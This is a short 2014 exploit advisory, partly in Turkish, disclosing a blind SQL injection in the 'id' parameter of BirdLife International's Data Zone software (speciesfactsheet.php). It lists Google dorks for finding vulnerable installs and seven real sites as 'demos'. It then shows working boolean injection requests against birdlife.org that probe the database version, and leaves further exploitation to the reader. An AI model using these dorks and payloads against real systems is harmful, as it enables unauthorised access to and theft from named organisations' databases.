Bug Bana Ait Değildir !
[+] Author : KnocKout
[~] E-mail: knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://Cyber-warrior.org
|~| Eski Dostlara Selam, kaldığımız yerden devam.
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : BirdLife International’s Data Zone
|~Price : N/A
|~Version : N/A
|~Software: http://www.qpqsoftware.com/qpq/portfolio
|~Vulnerability Style : Blind SQL Injection
|~Vulnerability Dir : /datazone/
|~Dorks:
inurl:speciesfactsheet.php
inurl:/datazone/ QPQ Software
|[~]Date : "4 EYLUL 2014"
|[~]Tested on :
(L)Kali Linux,
(R)Apache 2.2.22, PHP 5.3.10
(R)MySQL 5.0.11
----------------------------------------------------------
speciesfactsheet.php ’id’ Function Not Security
--------------------------------------------------------
DEMOS;
http://worldbirdwatch.org/datazone/
http://www.spoonbilledsandpiper.info/datazone/
http://www.birdlife.org/datazone/
http://rarebirdclub.org/datazone/
http://www.save-spoony.info/datazone/
www.worldbirdfestival.org/datazone/
http://bl-www.spoiledmilkclients.com/datazone/
~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|{~~~~~~~~ Explotation| Blind SQL Injection~~~~~~~~~~~}|
HTTP://{TARGET}/datazone/speciesfactsheet.php?id= //SQL command
Example;
Mysql Version?
SQL Injecting : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=4 {FALSE}
SQL Injecting Retry : www.birdlife.org/datazone/speciesfactsheet.php?id=359 and substring(@@version,1,1)=5 {TRUE}
the rest is up to you exploit.
================================================================
Kaynak h4x0re Security:
http://h4x0resec.blogspot.com.tr/2014/09/0day-birdlife-internationals-data-zone.html
.png)
Hiç yorum yok: